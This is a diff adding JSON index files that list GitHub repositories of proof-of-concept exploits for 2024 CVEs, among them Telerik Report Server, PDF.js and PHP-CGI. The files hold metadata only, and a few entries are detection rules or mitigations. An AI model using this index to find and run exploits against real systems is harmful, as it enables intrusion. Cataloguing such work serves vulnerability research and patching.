+ "description": "This proof-of-concept script demonstrates how to exploit CVE-2024-4323, a memory corruption vulnerability in Fluent Bit, enabling remote code execution.",
+ "fork": false,
+ "created_at": "2024-05-20T15:04:13Z",
+ "updated_at": "2024-06-17T07:29:18Z",
+ "pushed_at": "2024-05-20T15:28:07Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2024-4323",
+ "cve-2024-4323-exploit-poc",
+ "exploit",
+ "exploit-poc",
+ "fluent-bit",
+ "rce-exploit"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803825364,
+ "name": "CVE-2024-4323",
+ "full_name": "d0rb\/CVE-2024-4323",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4323",
+ "description": "Critical heap buffer overflow vulnerability in the handle_trace_request and parse_trace_request functions of the Fluent Bit HTTP server.",
+ "fork": false,
+ "created_at": "2024-05-21T12:59:16Z",
+ "updated_at": "2024-05-21T13:15:40Z",
+ "pushed_at": "2024-05-21T13:15:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804283459,
+ "name": "CVE-2024-4323-dos_poc",
+ "full_name": "yuansec\/CVE-2024-4323-dos_poc",
+ "owner": {
+ "login": "yuansec",
+ "id": 18318654,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18318654?v=4",
+ "html_url": "https:\/\/github.com\/yuansec"
+ },
+ "html_url": "https:\/\/github.com\/yuansec\/CVE-2024-4323-dos_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-22T09:55:30Z",
+ "updated_at": "2024-05-22T10:13:52Z",
+ "pushed_at": "2024-05-22T10:13:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4352.json b/2024/CVE-2024-4352.json
new file mode 100644
index 0000000000..288a6e0f54
--- /dev/null
+++ b/2024/CVE-2024-4352.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 801605479,
+ "name": "CVE-2024-4352-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-4352-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4352-Poc",
+ "description": "CVE-2024-4352 Tutor LMS Pro <= 2.7.0 - Missing Authorization to SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-16T14:55:43Z",
+ "updated_at": "2024-05-17T08:03:03Z",
+ "pushed_at": "2024-05-17T08:03:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4358.json b/2024/CVE-2024-4358.json
new file mode 100644
index 0000000000..5c9fb42f16
--- /dev/null
+++ b/2024/CVE-2024-4358.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 809672691,
+ "name": "CVE-2024-4358",
+ "full_name": "sinsinology\/CVE-2024-4358",
+ "owner": {
+ "login": "sinsinology",
+ "id": 77316200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4",
+ "html_url": "https:\/\/github.com\/sinsinology"
+ },
+ "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-4358",
+ "description": "Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358\/CVE-2024-1800)",
+ "fork": false,
+ "created_at": "2024-06-03T08:22:10Z",
+ "updated_at": "2024-06-20T23:31:49Z",
+ "pushed_at": "2024-06-06T16:18:08Z",
+ "stargazers_count": 60,
+ "watchers_count": 60,
+ "has_discussions": false,
+ "forks_count": 15,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 15,
+ "watchers": 60,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810273513,
+ "name": "CVE-2024-4358",
+ "full_name": "RevoltSecurities\/CVE-2024-4358",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-4358",
+ "description": "An Vulnerability detection and Exploitation tool for CVE-2024-4358",
+ "fork": false,
+ "created_at": "2024-06-04T11:32:59Z",
+ "updated_at": "2024-06-10T04:58:38Z",
+ "pushed_at": "2024-06-04T11:41:27Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810399215,
+ "name": "CVE-2024-4358",
+ "full_name": "Harydhk7\/CVE-2024-4358",
+ "owner": {
+ "login": "Harydhk7",
+ "id": 148646710,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148646710?v=4",
+ "html_url": "https:\/\/github.com\/Harydhk7"
+ },
+ "html_url": "https:\/\/github.com\/Harydhk7\/CVE-2024-4358",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T16:07:36Z",
+ "updated_at": "2024-06-04T16:23:17Z",
+ "pushed_at": "2024-06-04T16:23:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810576909,
+ "name": "CVE-2024-4358_Mass_Exploit",
+ "full_name": "Sk1dr0wz\/CVE-2024-4358_Mass_Exploit",
+ "owner": {
+ "login": "Sk1dr0wz",
+ "id": 108571358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108571358?v=4",
+ "html_url": "https:\/\/github.com\/Sk1dr0wz"
+ },
+ "html_url": "https:\/\/github.com\/Sk1dr0wz\/CVE-2024-4358_Mass_Exploit",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-05T01:05:12Z",
+ "updated_at": "2024-06-25T12:29:27Z",
+ "pushed_at": "2024-06-05T11:28:40Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 812526267,
+ "name": "CVE-2024-4358",
+ "full_name": "verylazytech\/CVE-2024-4358",
+ "owner": {
+ "login": "verylazytech",
+ "id": 172168670,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4",
+ "html_url": "https:\/\/github.com\/verylazytech"
+ },
+ "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-4358",
+ "description": "Authentication Bypass Vulnerability — CVE-2024–4358 — Telerik Report Server 2024",
+ "fork": false,
+ "created_at": "2024-06-09T06:30:06Z",
+ "updated_at": "2024-06-14T14:41:10Z",
+ "pushed_at": "2024-06-09T06:51:42Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4367.json b/2024/CVE-2024-4367.json
new file mode 100644
index 0000000000..d85170ac23
--- /dev/null
+++ b/2024/CVE-2024-4367.json
@@ -0,0 +1,288 @@
+[
+ {
+ "id": 803221600,
+ "name": "CVE-2024-4367-PoC",
+ "full_name": "LOURC0D3\/CVE-2024-4367-PoC",
+ "owner": {
+ "login": "LOURC0D3",
+ "id": 83567597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83567597?v=4",
+ "html_url": "https:\/\/github.com\/LOURC0D3"
+ },
+ "html_url": "https:\/\/github.com\/LOURC0D3\/CVE-2024-4367-PoC",
+ "description": "CVE-2024-4367 & CVE-2024-34342 Proof of Concept",
+ "fork": false,
+ "created_at": "2024-05-20T10:02:23Z",
+ "updated_at": "2024-06-26T02:31:36Z",
+ "pushed_at": "2024-06-07T03:28:00Z",
+ "stargazers_count": 73,
+ "watchers_count": 73,
+ "has_discussions": false,
+ "forks_count": 12,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 12,
+ "watchers": 73,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 803533618,
+ "name": "CVE-2024-4367-POC",
+ "full_name": "s4vvysec\/CVE-2024-4367-POC",
+ "owner": {
+ "login": "s4vvysec",
+ "id": 153960960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153960960?v=4",
+ "html_url": "https:\/\/github.com\/s4vvysec"
+ },
+ "html_url": "https:\/\/github.com\/s4vvysec\/CVE-2024-4367-POC",
+ "description": "CVE-2024-4367 arbitrary js execution in pdf js",
+ "fork": false,
+ "created_at": "2024-05-20T22:56:10Z",
+ "updated_at": "2024-06-24T09:47:50Z",
+ "pushed_at": "2024-05-20T23:09:43Z",
+ "stargazers_count": 42,
+ "watchers_count": 42,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 42,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804506786,
+ "name": "detect-cve-2024-4367",
+ "full_name": "spaceraccoon\/detect-cve-2024-4367",
+ "owner": {
+ "login": "spaceraccoon",
+ "id": 18413849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18413849?v=4",
+ "html_url": "https:\/\/github.com\/spaceraccoon"
+ },
+ "html_url": "https:\/\/github.com\/spaceraccoon\/detect-cve-2024-4367",
+ "description": "YARA detection rule for CVE-2024-4367 arbitrary javascript execution in PDF.js",
+ "fork": false,
+ "created_at": "2024-05-22T18:05:47Z",
+ "updated_at": "2024-06-13T16:05:04Z",
+ "pushed_at": "2024-05-27T03:06:09Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804608693,
+ "name": "pdfjs-vuln-demo",
+ "full_name": "clarkio\/pdfjs-vuln-demo",
+ "owner": {
+ "login": "clarkio",
+ "id": 6265396,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265396?v=4",
+ "html_url": "https:\/\/github.com\/clarkio"
+ },
+ "html_url": "https:\/\/github.com\/clarkio\/pdfjs-vuln-demo",
+ "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367",
+ "fork": false,
+ "created_at": "2024-05-22T23:18:20Z",
+ "updated_at": "2024-06-12T16:35:44Z",
+ "pushed_at": "2024-06-14T02:21:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "application-security",
+ "appsec",
+ "astro",
+ "astrojs",
+ "pdf",
+ "pdfjs",
+ "pdfjs-dist",
+ "react",
+ "security",
+ "svelte",
+ "vue",
+ "vuejs",
+ "web"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804747982,
+ "name": "pdfjs_disable_eval",
+ "full_name": "avalahEE\/pdfjs_disable_eval",
+ "owner": {
+ "login": "avalahEE",
+ "id": 56412727,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56412727?v=4",
+ "html_url": "https:\/\/github.com\/avalahEE"
+ },
+ "html_url": "https:\/\/github.com\/avalahEE\/pdfjs_disable_eval",
+ "description": "CVE-2024-4367 mitigation for Odoo 14.0",
+ "fork": false,
+ "created_at": "2024-05-23T07:34:15Z",
+ "updated_at": "2024-05-27T08:25:46Z",
+ "pushed_at": "2024-05-27T07:23:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "odoo14"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 814724272,
+ "name": "cve-2024-4367-PoC-fixed",
+ "full_name": "Zombie-Kaiser\/cve-2024-4367-PoC-fixed",
+ "owner": {
+ "login": "Zombie-Kaiser",
+ "id": 141570642,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4",
+ "html_url": "https:\/\/github.com\/Zombie-Kaiser"
+ },
+ "html_url": "https:\/\/github.com\/Zombie-Kaiser\/cve-2024-4367-PoC-fixed",
+ "description": "PDF.js是由Mozilla维护的基于JavaScript的PDF查看器。此漏洞允许攻击者在打开恶意 PDF 文件后立即执行任意 JavaScript 代码。这会影响所有 Firefox 用户 (<126),因为 Firefox 使用 PDF.js 来显示 PDF 文件,但也严重影响了许多基于 Web 和 Electron 的应用程序,这些应用程序(间接)使用 PDF.js 进行预览功能。",
+ "fork": false,
+ "created_at": "2024-06-13T15:14:47Z",
+ "updated_at": "2024-06-16T12:14:25Z",
+ "pushed_at": "2024-06-13T15:19:57Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 816264581,
+ "name": "pdfjs-vuln-demo",
+ "full_name": "snyk-labs\/pdfjs-vuln-demo",
+ "owner": {
+ "login": "snyk-labs",
+ "id": 47793611,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47793611?v=4",
+ "html_url": "https:\/\/github.com\/snyk-labs"
+ },
+ "html_url": "https:\/\/github.com\/snyk-labs\/pdfjs-vuln-demo",
+ "description": "This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367",
+ "fork": false,
+ "created_at": "2024-06-17T11:39:41Z",
+ "updated_at": "2024-06-25T03:09:51Z",
+ "pushed_at": "2024-06-20T13:40:31Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 817529952,
+ "name": "PDFernetRemotelo",
+ "full_name": "UnHackerEnCapital\/PDFernetRemotelo",
+ "owner": {
+ "login": "UnHackerEnCapital",
+ "id": 173314584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173314584?v=4",
+ "html_url": "https:\/\/github.com\/UnHackerEnCapital"
+ },
+ "html_url": "https:\/\/github.com\/UnHackerEnCapital\/PDFernetRemotelo",
+ "description": "PoC - Prueba de Concepto de CVE-2024-4367 en conjunto al CVE-2023-38831 en un solo Script",
+ "fork": false,
+ "created_at": "2024-06-19T23:23:07Z",
+ "updated_at": "2024-06-20T03:51:14Z",
+ "pushed_at": "2024-06-20T00:02:49Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818158611,
+ "name": "CVE-2024-4367-npm",
+ "full_name": "Scivous\/CVE-2024-4367-npm",
+ "owner": {
+ "login": "Scivous",
+ "id": 66907785,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66907785?v=4",
+ "html_url": "https:\/\/github.com\/Scivous"
+ },
+ "html_url": "https:\/\/github.com\/Scivous\/CVE-2024-4367-npm",
+ "description": "CVE-2024-4367复现",
+ "fork": false,
+ "created_at": "2024-06-21T08:16:42Z",
+ "updated_at": "2024-06-21T08:16:45Z",
+ "pushed_at": "2024-06-21T08:16:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4439.json b/2024/CVE-2024-4439.json
new file mode 100644
index 0000000000..80e78aedb2
--- /dev/null
+++ b/2024/CVE-2024-4439.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 796592858,
+ "name": "CVE-2024-4439",
+ "full_name": "MielPopsssssss\/CVE-2024-4439",
+ "owner": {
+ "login": "MielPopsssssss",
+ "id": 79650146,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79650146?v=4",
+ "html_url": "https:\/\/github.com\/MielPopsssssss"
+ },
+ "html_url": "https:\/\/github.com\/MielPopsssssss\/CVE-2024-4439",
+ "description": "CVE-2024-4439 PoC",
+ "fork": false,
+ "created_at": "2024-05-06T08:50:23Z",
+ "updated_at": "2024-06-05T19:23:22Z",
+ "pushed_at": "2024-05-06T08:50:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 796599635,
+ "name": "CVE-2024-4439",
+ "full_name": "d0rb\/CVE-2024-4439",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2024-4439",
+ "description": "The provided exploit code leverages a stored Cross-Site Scripting (XSS) vulnerability (CVE-2024-4439) in WordPress Core versions up to 6.5.1.",
+ "fork": false,
+ "created_at": "2024-05-06T09:07:36Z",
+ "updated_at": "2024-05-09T11:20:23Z",
+ "pushed_at": "2024-05-06T09:09:18Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803543826,
+ "name": "-CVE-2024-4439",
+ "full_name": "xssor-dz\/-CVE-2024-4439",
+ "owner": {
+ "login": "xssor-dz",
+ "id": 34897518,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34897518?v=4",
+ "html_url": "https:\/\/github.com\/xssor-dz"
+ },
+ "html_url": "https:\/\/github.com\/xssor-dz\/-CVE-2024-4439",
+ "description": "WordPress Core < 6.5.2 - Unauthenticated & Authenticated (Contributor+) Stored Cross-Site Scripting via Avatar Block",
+ "fork": false,
+ "created_at": "2024-05-20T23:39:54Z",
+ "updated_at": "2024-05-20T23:44:48Z",
+ "pushed_at": "2024-05-20T23:44:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4443.json b/2024/CVE-2024-4443.json
new file mode 100644
index 0000000000..4d92c1cbd1
--- /dev/null
+++ b/2024/CVE-2024-4443.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 806196076,
+ "name": "CVE-2024-4443-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-4443-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-4443-Poc",
+ "description": "CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - Unauthenticated SQL Injection via listingfields Parameter",
+ "fork": false,
+ "created_at": "2024-05-26T16:34:58Z",
+ "updated_at": "2024-06-02T05:24:45Z",
+ "pushed_at": "2024-05-26T16:48:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4484.json b/2024/CVE-2024-4484.json
new file mode 100644
index 0000000000..e6fbb07671
--- /dev/null
+++ b/2024/CVE-2024-4484.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 814386906,
+ "name": "CVE-2024-4484",
+ "full_name": "Abo5\/CVE-2024-4484",
+ "owner": {
+ "login": "Abo5",
+ "id": 40110835,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40110835?v=4",
+ "html_url": "https:\/\/github.com\/Abo5"
+ },
+ "html_url": "https:\/\/github.com\/Abo5\/CVE-2024-4484",
+ "description": "This script uses HTTParty to detect stored cross-site scripting (XSS) vulnerabilities in WordPress sites using the xai_username parameter. It sends a payload to the specified URL and checks if the payload is reflected in the response, indicating a vulnerability.",
+ "fork": false,
+ "created_at": "2024-06-12T23:09:39Z",
+ "updated_at": "2024-06-12T23:18:07Z",
+ "pushed_at": "2024-06-12T23:18:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-4577.json b/2024/CVE-2024-4577.json
new file mode 100644
index 0000000000..c2a5df8e77
--- /dev/null
+++ b/2024/CVE-2024-4577.json
@@ -0,0 +1,1133 @@
+[
+ {
+ "id": 811695573,
+ "name": "CVE-2024-4577",
+ "full_name": "TAM-K592\/CVE-2024-4577",
+ "owner": {
+ "login": "TAM-K592",
+ "id": 8276702,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8276702?v=4",
+ "html_url": "https:\/\/github.com\/TAM-K592"
+ },
+ "html_url": "https:\/\/github.com\/TAM-K592\/CVE-2024-4577",
+ "description": "CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.",
+ "fork": false,
+ "created_at": "2024-06-07T05:50:23Z",
+ "updated_at": "2024-06-25T10:23:02Z",
+ "pushed_at": "2024-06-11T04:46:42Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 811783487,
+ "name": "CVE-2024-4577",
+ "full_name": "ohhhh693\/CVE-2024-4577",
+ "owner": {
+ "login": "ohhhh693",
+ "id": 41501723,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41501723?v=4",
+ "html_url": "https:\/\/github.com\/ohhhh693"
+ },
+ "html_url": "https:\/\/github.com\/ohhhh693\/CVE-2024-4577",
+ "description": "CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-07T09:42:31Z",
+ "updated_at": "2024-06-07T10:30:02Z",
+ "pushed_at": "2024-06-07T10:29:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811783553,
+ "name": "CVE-2024-4577",
+ "full_name": "Junp0\/CVE-2024-4577",
+ "owner": {
+ "login": "Junp0",
+ "id": 69783084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69783084?v=4",
+ "html_url": "https:\/\/github.com\/Junp0"
+ },
+ "html_url": "https:\/\/github.com\/Junp0\/CVE-2024-4577",
+ "description": "PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC",
+ "fork": false,
+ "created_at": "2024-06-07T09:42:40Z",
+ "updated_at": "2024-06-16T15:27:28Z",
+ "pushed_at": "2024-06-07T09:40:00Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 811785816,
+ "name": "CVE-2024-4577",
+ "full_name": "princew88\/CVE-2024-4577",
+ "owner": {
+ "login": "princew88",
+ "id": 165123229,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165123229?v=4",
+ "html_url": "https:\/\/github.com\/princew88"
+ },
+ "html_url": "https:\/\/github.com\/princew88\/CVE-2024-4577",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-07T09:48:36Z",
+ "updated_at": "2024-06-07T09:48:40Z",
+ "pushed_at": "2024-06-07T09:48:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811786940,
+ "name": "CVE-2024-4577",
+ "full_name": "11whoami99\/CVE-2024-4577",
+ "owner": {
+ "login": "11whoami99",
+ "id": 122907550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122907550?v=4",
+ "html_url": "https:\/\/github.com\/11whoami99"
+ },
+ "html_url": "https:\/\/github.com\/11whoami99\/CVE-2024-4577",
+ "description": "POC & $BASH script for CVE-2024-4577",
+ "fork": false,
+ "created_at": "2024-06-07T09:51:39Z",
+ "updated_at": "2024-06-21T00:53:45Z",
+ "pushed_at": "2024-06-09T16:16:30Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 811787428,
+ "name": "CVE-2024-4577",
+ "full_name": "watchtowrlabs\/CVE-2024-4577",
+ "owner": {
+ "login": "watchtowrlabs",
+ "id": 99977116,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4",
+ "html_url": "https:\/\/github.com\/watchtowrlabs"
+ },
+ "html_url": "https:\/\/github.com\/watchtowrlabs\/CVE-2024-4577",
